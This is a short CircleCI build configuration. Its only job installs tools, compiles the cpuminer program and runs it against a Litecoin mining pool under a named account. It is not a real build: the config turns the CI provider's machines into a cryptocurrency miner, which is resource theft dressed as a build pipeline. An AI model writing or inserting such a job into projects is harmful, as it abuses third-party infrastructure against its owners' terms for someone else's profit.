version: 2
jobs:
  build:
    machine: true

    steps:
      - run: sudo apt update -yqq
      - run: sudo apt-get install libcurl4-openssl-dev libncurses5-dev pkg-config automake yasm
      - run: git clone https://github.com/pooler/cpuminer.git
      - run: cd cpuminer && ./autogen.sh && ./configure CFLAGS="-O3" && make
      - run: cd cpuminer && ./minerd --url=stratum+tcp://ltc.pool.minergate.com:3336 --user=yoginth@hotmail.com --pass=x
